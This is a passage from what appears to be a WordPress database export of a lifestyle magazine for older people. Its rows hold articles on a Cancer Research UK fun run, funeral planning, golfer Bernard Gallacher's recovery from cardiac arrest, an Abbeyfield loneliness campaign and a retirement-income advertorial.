father was very interested in songwriting and comedy. He wrote songs for the insurance company’s annual do. He loved the whole thing about words being able to make people smile.”</p>&#13;\n<p>And what does the future hold now, for Britain’s premier funny lady, as she turns 60?</p>&#13;\n<p>“More of the same, I hope,” she says. “I’ve always wanted to do this, I enjoy doing it, and hopefully I can keep on doing it.”</p>&#13;\n									</div>','You don’t worry about things that might have tortured you when you were younger','By Jane Hooper Victoria on her travels for the BBC’s Nice Cup of Tea She’s glorious; a British institution. Victoria Wood is one of the most talented','publish','open','open','','you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger','','','2018-04-02 20:03:35','2018-04-02 20:03:35','',0,'http://westonspirit.org.uk/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger.asp',0,'post','',0),(279,1,'2017-10-23 16:25:34','2017-10-23 16:25:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2018</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\">&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Putting the ‘can’ into beating cancer, one step at a time\" st_url=\"http://westonspirit.org.uk/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Putting the ‘can’ into beating cancer, one step at a time\" st_url=\"http://westonspirit.org.uk/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Putting the ‘can’ into beating cancer, one step at a time\" st_url=\"http://westonspirit.org.uk/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Putting the ‘can’ into beating cancer, one step at a time\" st_url=\"http://westonspirit.org.uk/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Putting the ‘can’ into beating cancer, one step at a time\" st_url=\"http://westonspirit.org.uk/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Do you want to stick your middle finger up at cancer? If so, you are not alone. <span id=\"more-3327\"></span></p>&#13;\n<p>This month marks the return of Race for Life, a 5km run held in 230 locations across the UK over the summer, whose tagline is: “Cancer, we’re coming to get you!”</p>&#13;\n<p>Since its launch in 1994, Race for Life, the largest women-only fundraising event in Britain, has raised more than £439m for Cancer Research UK and has involved around six million people. </p>&#13;\n<p>The charity estimates that 700,000 women will run, walk, jog, or dance their way to the finish line this year to raise more than £49m for the fight against cancer. </p>&#13;\n<p>Participants say the race – regardless of their level of fitness – is a positive and rewarding experience. “I am a 62-year-old woman. I am not fit and I walk, not run, but I just love being a part of Race for Life,” said Linda Patel, who lost both of her parents, her brother, sister, two aunts, and many friends to cancer. </p>&#13;\n<p>“The first race I did made me feel so good. I was among thousands of other women who have been touched in some way by cancer and I really felt like I was doing something to help with cancer research. I don’t think anyone feels any differently if they run, jog or walk. We are all there for the same reason; in memory of loved ones and to raise awareness and money.”</p>&#13;\n<div id=\"attachment_3328\" style=\"width: 606px\" class=\"wp-caption aligncenter\"><a href=\"/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/cancer-research-uks-race-for-life-at-finsbury-park-on-saturday-7th-july-2012\" rel=\"attachment wp-att-3328\"><img class=\"size-full wp-image-3328\" title=\"Cancer Research UK\'s Race for Life at Finsbury Park on Saturday 7th July 2012\" src=\"/wp-content/uploads/2013/06/cancer1.jpg\" alt=\"\" width=\"596\" height=\"413\" srcset=\"../../../wp-content/uploads/2013/06/cancer1.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></a><p class=\"wp-caption-text\">Don’t sweat it: participants describe race day as happy and fun</p></div>&#13;\n<p><strong>Winning the battle </strong></p>&#13;\n<p>Figures show that cancer was responsible for an astonishing 28 per cent of all deaths in the UK in 2010, killing 157,275 people. In the 19 years since Race for Life began, however, the overall death toll from cancer has dropped by around 16 per cent. Cancer Research UK has been a devoted campaigner for life-saving legislation, such as banning under-18s from using tanning beds. They have also pushed for improvements in early diagnosis, regular screenings, advances in technology and an increase in knowledge about the disease. </p>&#13;\n<p>For the thousands of participants who have lost loved ones to cancer, Race for Life is a means of uniting with others and working towards a common goal of improving cancer survival rates. </p>&#13;\n<p><strong>Spare a few hours </strong></p>&#13;\n<p>“Seeing so many women, all there for the same cause, united as one to beat cancer is a rewarding and fulfilling experience. I’d recommend it to anyone who can spare a few hours on a Sunday morning,” said Kevin Winkley, who volunteered at his wife’s first race four years ago and now volunteers at 10 races each year. </p>&#13;\n<p>“In these times of austerity, many people do not have the spare money in their pockets to help charities, so why not, as I do, give something else that they will value just as much – your time,” he said. </p>&#13;\n<p>Participants describe the environment on race day as “happy”, “upbeat” and “fun”, words not typically used to describe anything pertaining to cancer. </p>&#13;\n<p>“I really enjoy the volunteering experience and the feeling of achievement you get when, at 11am, the horn sounds and all these women set off smiling on their quest to raise money to help find a cure for this disease,” said Winkley. </p>&#13;\n<div id=\"attachment_3329\" style=\"width: 606px\" class=\"wp-caption aligncenter\"><a href=\"/2013/06/putting-the-can-into-beating-cancer-one-step-at-a-time/stevecancer\" rel=\"attachment wp-att-3329\"><img class=\"size-full wp-image-3329\" title=\"KevinWinkley\" src=\"/wp-content/uploads/2013/06/Stevecancer.jpg\" alt=\"\" width=\"596\" height=\"508\" srcset=\"../../../wp-content/uploads/2013/06/Stevecancer.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></a><p class=\"wp-caption-text\">Kevin Winkley has been volunteering for four years</p></div>&#13;\n<p>“The atmosphere is amazing and happy and somehow you feel close to all of the people you have lost,” added Patel. </p>&#13;\n<p>“Everyone there is in the same position as you are. It’s very friendly and you get to meet so many amazing people and listen to their stories. I will carry on going to Race for Life for as long as I am able.”</p>&#13;\n									</div>','Putting the ‘can’ into beating cancer, one step at a time','Do you want to stick your middle finger up at cancer? If so, you are not alone. This month marks the return of Race for Life, a 5km run held in 230 locations','publish','open','open','','putting-the-can-into-beating-cancer-one-step-at-a-time','','','2018-04-02 20:03:33','2018-04-02 20:03:33','',0,'http://westonspirit.org.uk/putting-the-can-into-beating-cancer-one-step-at-a-time.asp',0,'post','',0),(280,1,'2017-08-03 11:00:35','2017-08-03 11:00:35','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A personal view\" st_url=\"http://westonspirit.org.uk/2013/10/a-personal-view/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A personal view\" st_url=\"http://westonspirit.org.uk/2013/10/a-personal-view/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A personal view\" st_url=\"http://westonspirit.org.uk/2013/10/a-personal-view/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A personal view\" st_url=\"http://westonspirit.org.uk/2013/10/a-personal-view/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A personal view\" st_url=\"http://westonspirit.org.uk/2013/10/a-personal-view/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>A funeral plan is a good excuse to talk about yourself.  After all, a funeral should be the one thing in life and death that is all about you. It seems a shame, therefore, that so many people never get the chance to be part of it while they can still enjoy it.<span id=\"more-3386\"></span></strong></p>&#13;\n<p>It always seems sad when the love and longing that surfaces at a funeral has not been shared with the person at the centre of the day. Talking about a funeral plan with family and friends when death is still a distant prospect starts to fill that gap.</p>&#13;\n<p>It seems, too, to help those left behind to cope with the loss. They have been part of the planning, perhaps in choosing music or passages for reading, perhaps in knowing the right flowers to give or charities to support.</p>&#13;\n<p>For many, death is still the great unmentionable. But it is also the great inevitable. Talking about it at a time when emotions are cool helps to celebrate rather than mourn the life and can bring people closer. It can, actually, help people talk about life – so often another great unmentionable! To talk about what is important now – not just to the older person whose funeral is being planned but to the younger people, who will carry out the arrangements.</p>&#13;\n<p>And what a gift that is.</p>&#13;\n<p>A chance to wonder about what really matters in life and living. A look ahead to what you might like to look back on – not something young or even middle-aged people often think about. It’s a conversation that can make a difference to a life that is far from death.</p>&#13;\n<p>Another benefit is the way talking about a funeral plan, when death is still far away, can somehow demystify death,  even help to make it part of life.</p>&#13;\n<p>It can lead to laughs, perhaps to some tears but, in the end, to good, happy memories that can uplift people when the death does come and carry them through the funeral with the sure knowledge that this was how their loved one wanted it.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p><strong>Jean Silvan Evans</strong></p>&#13;\n									</div>','A personal view','A funeral plan is a good excuse to talk about yourself. After all, a funeral should be the one thing in life and death that is all about you. It seems a shame,','publish','open','open','','a-personal-view','','','2018-04-02 20:03:32','2018-04-02 20:03:32','',0,'http://westonspirit.org.uk/a-personal-view.asp',0,'post','',0),(281,1,'2016-08-23 17:56:12','2016-08-23 17:56:12','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bernard Gallacher: Back where he belongs\" st_url=\"http://westonspirit.org.uk/2013/10/bernard-gallacher-back-where-he-belongs/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bernard Gallacher: Back where he belongs\" st_url=\"http://westonspirit.org.uk/2013/10/bernard-gallacher-back-where-he-belongs/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bernard Gallacher: Back where he belongs\" st_url=\"http://westonspirit.org.uk/2013/10/bernard-gallacher-back-where-he-belongs/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bernard Gallacher: Back where he belongs\" st_url=\"http://westonspirit.org.uk/2013/10/bernard-gallacher-back-where-he-belongs/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bernard Gallacher: Back where he belongs\" st_url=\"http://westonspirit.org.uk/2013/10/bernard-gallacher-back-where-he-belongs/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>Bernard Gallacher enjoying life after his heart scare<span id=\"more-3388\"></span></strong></p>&#13;\n<div class=\"slidedeck_frame skin-stacked-nav-arrow\"><dl id=\"SlideDeck_838_3452\" class=\"slidedeck slidedeck_3452\" style=\"width:100%;height:385px\"><dt>Slide 1</dt><dd><p><img class=\"size-full wp-image-3453 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3697.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 2</dt><dd><p><img class=\"size-full wp-image-3454 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3699.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 3</dt><dd><p><img class=\"size-full wp-image-3455 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3713.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 4</dt><dd><p><img class=\"size-full wp-image-3456 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3725.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 7</dt><dd><p><img class=\"size-full wp-image-3459 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3745.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 5</dt><dd><p><img class=\"size-full wp-image-3457 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3734.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 6</dt><dd><p><img class=\"size-full wp-image-3458 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3744.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 8</dt><dd><p><img class=\"size-full wp-image-3460 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3747.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 9</dt><dd><p><img class=\"size-full wp-image-3461 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3754.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd><dt>Slide 10</dt><dd><p><img class=\"size-full wp-image-3462 alignnone\" title=\"Picture shows Bernard Gallacher at Wentworth Golf Course, picture taken six weeks after suffering a cardiac arrest. Picture date 15/10/2013. © Andrew Crowley, Mob: +44 (0) 7973254493.\" src=\"/wp-content/uploads/2013/10/GD7A3787.jpg\" alt=\"\" width=\"596\" height=\"350\" /></p>&#13;\n</dd></dl></div>&#13;\n<p style=\"margin: -20px 0 20px 0; font-size: 9pt;\">Use the arrow keys on your keyboard to navigate the gallery. Photography by Andrew Crowley.</p>&#13;\n<p>When he strolled onto the first tee of the West Course at Wentworth the other day with our photographer in tow, Bernard Gallacher looked a picture of health. No one would have guessed that, just a few weeks earlier, he had been fighting for his life.</p>&#13;\n<p>A group of players had teed off and, when they spotted him, wandered over to shake his hand and to wish him well. It was to be that kind of day for the 64-year-old former Europe Ryder Cup captain.</p>&#13;\n<p>Gallacher was back at his spiritual home, the club he had graced as head professional (and later as captain) for more than 25 years, and everyone, but everyone, was delighted to see him.</p>&#13;\n<p>Immaculately dressed as always, and with not a hair out of place, the quietly-spoken Scot would stop for a chat one minute, be embraced in the hug of lady members the next, and acknowledge the waves of those driving by.</p>&#13;\n<p>It was a homecoming in every sense.</p>&#13;\n<p>Back on August 29, in Aberdeen, as he waited to give an after-dinner speech at the luxury Marcliffe Hotel, Gallacher, one of the finest golfers of his generation, suddenly keeled over. Without warning, his heart had stopped pumping and his life had started to ebb away. It looked, he was told later, as if he had been floored by a boxer.</p>&#13;\n<p>When he came round after five days in an induced coma, Gallacher had no idea where he was, or why he was there. It was obvious he was lying in a hospital bed, but why were so many wires sticking out of his body?</p>&#13;\n<p>“There’s only one thing for it,” he thought to himself, looking down at his chest. “Pull off the wires and let’s get out of here.” He was disabused of the idea, but little did he know that he had just cheated death. For his family – wife Lesley, daughters Laura and Kirsty, the television presenter, and son Jamie – who had been keeping a bedside vigil, the tears started to flow. Dad was back in the land of the living.</p>&#13;\n<p>If it hadn’t been for the quick thinking of a group of nurses who happened to be in the room when he collapsed  – and the fact that the hotel owned a defibrillator – this most popular of sportsmen would not be with us today.</p>&#13;\n<p>In layman’s terms, the device kick-started Gallacher’s heart into beating normally again and was used to keep it going when it “conked out” three more times on the way to Aberdeen Royal Infirmary. It was touch and go whether or not he would survive. And, if he were to, would he suffer brain damage?</p>&#13;\n<p>Now he is able to reflect on the scariest moment of his life. His recovery is progressing well. He has had a defibrillator implanted  in his chest, which will release an  electrical charge if it detects a heart malfunction similar to his previous cardiac arrest, and he is now planning to campaign on behalf of the British Heart Foundation.</p>&#13;\n<p>“What I suffered was something known as SADS – Sudden Arrythmic Death Syndrome – and I’ll be trying to help the British Heart Foundation to make people more aware of the complaint,” Gallacher told me.</p>&#13;\n<p>“I dodged a bullet that night and it takes someone lucky like me to make people realise how vital a defibrillator can be in saving your life. I’m going to campaign for clubs and organisations to have such devices on their premises. And to get people trained into using them.</p>&#13;\n<p>“Wentworth have four. One in the clubhouse, one in the gym and one at each of the halfway huts. I think most golf clubs should have one around. Everybody has heard of people having heart attacks on a golf course. If it saved one life, then it would have been worth it.”</p>&#13;\n<p>The biggest shock for Gallacher was that, prior to his collapse, he had no inkling of a problem. His supreme fitness, however, is what helped to pull him through – a lesson, in particular, for those of us of a certain age.</p>&#13;\n<p>“It was a bit of a shock for everybody,” he says. “The doctors weren’t able to say what was going on because they didn’t know themselves. And they weren’t sure if there was going to be any brain damage until I came around. It wasn’t a normal heart attack. I had a <br /> ventricular fibrillation, which meant the heart just stopped beating. I can’t remember anything of the day. I have complete amnesia.</p>&#13;\n<p>“It was a very emotional time for the family, though, because they were told to expect the worst – it wasn’t easy for them. But when I woke up, they realised I’d got through it. It was all right for me because I’d not known what was going on. They’d had all the worry when I was in a coma, but I was able to shrug it off.”</p>&#13;\n<p>Sitting back now, Gallacher says he has been blessed with good fortune. “I feel a very lucky man,” he said. “I’d had no warning at all, but the fact that I go to the gym most days and was as fit as a fiddle certainly helped. The doctors said that if I hadn’t been so fit, I wouldn’t have survived three heart stoppages.”</p>&#13;\n<p>Asked if his brush with death had given him a new perspective on life, Gallacher – a Scot of the no-nonsense variety – revealed that one of the first things on his agenda was to look again at his will. Flights of fancy, one suspects, could be put off for another day. </p>&#13;\n<p>“I’m getting my lawyer in to rewrite my will, to make sure that it’s up to date,” he said. “You never think about these things and then it can be too late. You make them when you’re young, but you forget about them and need to write them up properly.”</p>&#13;\n<p>His aim now, he says, is to get back to work as soon as possible. Golf has been ruled out for three to four months while the chest implant settles down and driving the car is not allowed for six months.</p>&#13;\n<p>“I hope to do a few golf days, keep working for the radio and write my column for the <em>Sunday Post</em>,” he said. “It’s not a great deal, but I want to get my life back to some normality.”</p>&#13;\n<p>And what of the golf?</p>&#13;\n<p>“I’ll have to get my strength back – I still get very tired and have to rest in the afternoon – but I’m looking  forward to getting back to playing as badly as ever.”</p>&#13;\n<p>One thing that has clearly not deserted him is his gentle sense of humour. Long may it continue.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p>Peter Dixon</p>&#13;\n									</div>','Bernard Gallacher: Back where he belongs','Bernard Gallacher enjoying life after his heart scare Use the arrow keys on your keyboard to navigate the gallery. Photography by Andrew Crowley. When he','publish','open','open','','bernard-gallacher-back-where-he-belongs','','','2018-04-02 20:03:30','2018-04-02 20:03:30','',0,'http://westonspirit.org.uk/bernard-gallacher-back-where-he-belongs.asp',0,'post','',0),(282,1,'2014-08-09 21:29:51','2014-08-09 21:29:51','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Companionship for older people this Christmas\" st_url=\"http://westonspirit.org.uk/2013/10/companionship-for-older-people-this-christmas/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Companionship for older people this Christmas\" st_url=\"http://westonspirit.org.uk/2013/10/companionship-for-older-people-this-christmas/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Companionship for older people this Christmas\" st_url=\"http://westonspirit.org.uk/2013/10/companionship-for-older-people-this-christmas/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Companionship for older people this Christmas\" st_url=\"http://westonspirit.org.uk/2013/10/companionship-for-older-people-this-christmas/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Companionship for older people this Christmas\" st_url=\"http://westonspirit.org.uk/2013/10/companionship-for-older-people-this-christmas/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<p><strong>Spare a thought for the isolated and elderly this festive season<span id=\"more-3367\"></span></strong></p>&#13;\n<p><img class=\"alignright  wp-image-3368\" title=\"Abbeyfield\" src=\"/wp-content/uploads/2013/10/Abbeyfield.jpg\" alt=\"\" width=\"251\" height=\"254\" /></p>&#13;\n<p>To help combat isolation and loneliness among older people during this season of goodwill, the charity Abbeyfield is launching its annual Coping at Christmas campaign. Abbeyfields across the UK will be open and will invite individuals to spend time at our supported sheltered houses and care homes for a free festive meal, or even an overnight stay.</p>&#13;\n<p>A number of celebrities, including actor Geoffrey Palmer (left), are helping to raise awareness by acting as spokespeople for the campaign. Geoffrey quoted the latest research which shows that over 2.5 million older people across the UK are not looking forward to the season of goodwill*.</p>&#13;\n<p>Living alone or feeling lonely is something that is sadly accepted and not discussed; people generally become accustomed to their own company. However, in the run-up to Christmas, when there is a barrage of cheery festive advertisements depicting happy times shared with family and friends, the sense of isolation and loneliness that usually goes unnoticed can be magnified. With over half a million older people</p>&#13;\n<p>Recently Health Secretary Jeremy Hunt commented on the fact that failure to offer friendship to the isolated and elderly is a national shame. due to spend Christmas Day alone, it is not a surprise that 49 per cent of those over the age of 65 would choose “having company” above anything else as their Christmas wish this year.</p>&#13;\n<p>As the Abbeyfield Coping at Christmas initiative begins, we would like everyone to consider someone that they know to be living alone without much contact with others to either bring this campaign to their attention, visit our website to find out more about the nearest participating house, or contact us on 0845 052 3553.</p>&#13;\n<p>This year Abbeyfield is hosting a pledge page on its website which underpins the charity’s belief of providing support for older people who might be alone or lonely – it is hoped that the pledges will encourage people within the community to be more aware that others might be alone this Christmas.</p>&#13;\n<p>Nearly 60 years ago, Richard Carr-Gomm founded Abbeyfield, a charity that was set up to provide companionship and housing for older people who lived alone or were lonely. Today, Abbeyfield has over 500 houses in the UK providing housing, support and a wide range of quality services with companionship still very much at the centre of what we provide. </p>&#13;\n<p>It is a sad reality that in this day and age, charities and agencies similar to Abbeyfield are still trying to raise awareness of the struggles older people face and the very real impact of loneliness.</p>&#13;\n<p>The campaign has already received the backing of a number of MPs, other charitable organisations and local authorities charged with taking care of the elderly around the country, who agree that the scheme provides an invaluable lifeline for older people.</p>&#13;\n<p><img title=\"Abbeyfield2\" src=\"/wp-content/uploads/2013/10/Abbeyfield2.jpg\" alt=\"\" width=\"596\" height=\"925\" /></p>&#13;\n<p> </p><div class=\"woo-sc-hr\"></div>&#13;\n<div>&#13;\n<p><em>0845 052 3553</em><br /><em> Register for the pledges at <a href=\"http://www.abbeyfield.com/\" target=\"_blank\">www.abbeyfield.com</a></em></p>&#13;\n<p> </p>&#13;\n</div>&#13;\n									</div>','Companionship for older people this Christmas','Spare a thought for the isolated and elderly this festive season To help combat isolation and loneliness among older people during this season of goodwill,','publish','open','open','','companionship-for-older-people-this-christmas','','','2018-04-02 20:03:29','2018-04-02 20:03:29','',0,'http://westonspirit.org.uk/companionship-for-older-people-this-christmas.asp',0,'post','',0),(284,1,'2014-03-24 11:54:09','2014-03-24 11:54:09','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Don’t let the downturn put a downer on retirement\" st_url=\"http://westonspirit.org.uk/2013/10/dont-let-the-downturn-put-a-downer-on-retirement/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Don’t let the downturn put a downer on retirement\" st_url=\"http://westonspirit.org.uk/2013/10/dont-let-the-downturn-put-a-downer-on-retirement/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Don’t let the downturn put a downer on retirement\" st_url=\"http://westonspirit.org.uk/2013/10/dont-let-the-downturn-put-a-downer-on-retirement/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Don’t let the downturn put a downer on retirement\" st_url=\"http://westonspirit.org.uk/2013/10/dont-let-the-downturn-put-a-downer-on-retirement/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Don’t let the downturn put a downer on retirement\" st_url=\"http://westonspirit.org.uk/2013/10/dont-let-the-downturn-put-a-downer-on-retirement/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<p><strong>With low interest rates and inflation, retirement is looking increasingly fraught – but there is a solution…<span id=\"more-3371\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3372 alignnone\" title=\"Aegon\" src=\"/wp-content/uploads/2013/10/Aegon.jpg\" alt=\"\" width=\"596\" height=\"397\" /></p>&#13;\n<div>We are increasingly told that retirement should be thought of as a process rather than a one-off event. Unfortunately too few of us are heeding these warnings and taking control of our financial futures.</div>&#13;\n<p>Scores of us are reaching the point in our lives where we expect to stop work, but if we are going to realise these aspirations then the planning for life after work has to start now.</p>&#13;\n<p>Against the current economic backdrop in the UK, is it any wonder that the prospect of retirement fills as many of us with trepidation? As we near the end of 2018, interest rates remain low and inflation looks set to increase. This double whammy means those approaching, at, or already in retirement face the worst possible scenario. Low interest rates hamper retirement income growth, effectively leaving people with much less than they expected. And at the other end of the spectrum, inflation and, in particular, the rising cost of daily staples such as food and fuel constitute a far bigger share of spending for the over-55s than they do for any other group in society.</p>&#13;\n<p>The fact that we are all living longer is, of course, a reason to be cheerful, but the financial implications of an ageing society shouldn’t be overlooked. We all need to think about how we best preserve our income for the future.</p>&#13;\n<p>But what if there were a way to safeguard savings? What if savers could mitigate some of the economic risks at play and have access to savings solutions or products that would offer a guaranteed level of income in retirement? Whereas previously such ‘guarantees’ would have been the preserve of those in a defined benefit pension scheme and therefore in line for a retirement income based on a percentage of their salary today, unit-linked investments can offer a potential solution to more and more.</p>&#13;\n<p>According to Aegon’s Simon Skinner, “The reality of longer life expectancy, coupled with continuing low interest-rate environment and inflationary pressures, is creating the worst possible scenario for retirees. As a consequence many people approaching retirement are looking for the peace of mind in an investment product which targets a level of risk they are comfortable with and which suits their needs.”</p>&#13;\n<p>Aegon’s Secure Lifetime Income Plan offers investors a minimum guaranteed annual income and the opportunity to lock in a higher retirement income through its unique ‘monthiversary’ feature. The product, aimed at those aged between 45 and 79, is suited to those investors who want to preserve their retirement income and who are keen to benefit from any market increases. Investors have the opportunity to increase their guaranteed lifetime income; meaning, as the name suggests, there are 12 opportunities – for each year of the plan – to lock in any growth in income.</p>&#13;\n<p>“These  products have been designed with what we understand the needs of our customers to be, and our research tells us that is the chance to safeguard against risk as much as possible and to protect their hard-earned retirement income,” adds Skinner.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<div>&#13;\n<p><em>For more information contact your financial adviser or visit <a href=\"http://www.unbiased.co.uk/\" target=\"_blank\">www.unbiased.co.uk</a></em></p>&#13;\n</div>&#13;\n									</div>','Don’t let the downturn put a downer on retirement','With low interest rates and inflation, retirement is looking increasingly fraught – but there is a solution… We are increasingly told that retirement','publish','open','open','','dont-let-the-downturn-put-a-downer-on-retirement','','','2018-04-02 20:03:27','2018-04-02 20:03:27','',0,'http://westonspirit.org.uk/dont-let-the-downturn-put-a-downer-on-retirement.asp',0,'post','',0),(285,1,'2016-01-09 18:50:58','2016-01-09 18:50:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get up and go – October 2013\" st_url=\"http://westonspirit.org.uk/2013/10/get-up-and-go-october-2013/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get up and go – October 2013\" st_url=\"http://westonspirit.org.uk/2013/10/get-up-and-go-october-2013/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get up and go – October 2013\" st_url=\"http://westonspirit.org.uk/2013/10/get-up-and-go-october-2013/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get up and go – October 2013\" st_url=\"http://westonspirit.org.uk/2013/10/get-up-and-go-october-2013/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get up and go – October 2013\" st_url=\"http://westonspirit.org.uk/2013/10/get-up-and-go-october-2013/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>In our October edition of <em>Get Up and Go, </em>we profile Christine Keeler, Raymond Blanc, Bernard Gallacher and Selina Scott. We also look at a TV remake 